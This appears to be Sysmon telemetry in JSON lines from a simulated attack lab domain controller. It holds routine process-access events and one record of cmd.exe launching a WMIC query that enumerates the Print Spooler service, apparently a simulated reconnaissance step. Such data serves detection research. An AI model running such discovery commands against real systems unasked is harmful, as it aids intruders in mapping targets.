{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5394,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010A5BA0800}\r\nTargetProcessId: 4572\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010A5BA0800}","TargetProcessId":"4572","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5395,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.055\r\nProcessGuid: {41C8662E-20D6-5F25-0000-001058BB0800}\r\nProcessId: 4312\r\nImage: C:\\Windows\\System32\\wbem\\WMIC.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: WMI Commandline Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: wmic.exe\r\nCommandLine: wmic  /node:\"127.0.0.1\" service where (caption like \"%%Spooler%%\") \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E\r\nParentProcessGuid: {41C8662E-20D6-5F25-0000-0010A5BA0800}\r\nParentProcessId: 4572\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic /node:\"127.0.0.1\" service where (caption like \"%Spooler%\")\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.055","ProcessGuid":"{41C8662E-20D6-5F25-0000-001058BB0800}","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"WMI Commandline Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"wmic.exe","CommandLine":"wmic  /node:\"127.0.0.1\" service where (caption like \"%%Spooler%%\") ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E","ParentProcessGuid":"{41C8662E-20D6-5F25-0000-0010A5BA0800}","ParentProcessId":"4572","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic /node:\"127.0.0.1\" service where (caption like \"%Spooler%\")\" ","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5396,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-20D6-5F25-0000-0010A5BA0800}\r\nSourceProcessId: 4572\r\nSourceThreadId: 4292\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001058BB0800}\r\nTargetProcessId: 4312\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-20D6-5F25-0000-0010A5BA0800}","SourceProcessId":"4572","SourceThreadId":"4292","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001058BB0800}","TargetProcessId":"4312","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5397,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001058BB0800}\r\nTargetProcessId: 4312\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001058BB0800}","TargetProcessId":"4312","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5398,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5399,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5400,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5401,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5402,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.049\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.049","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
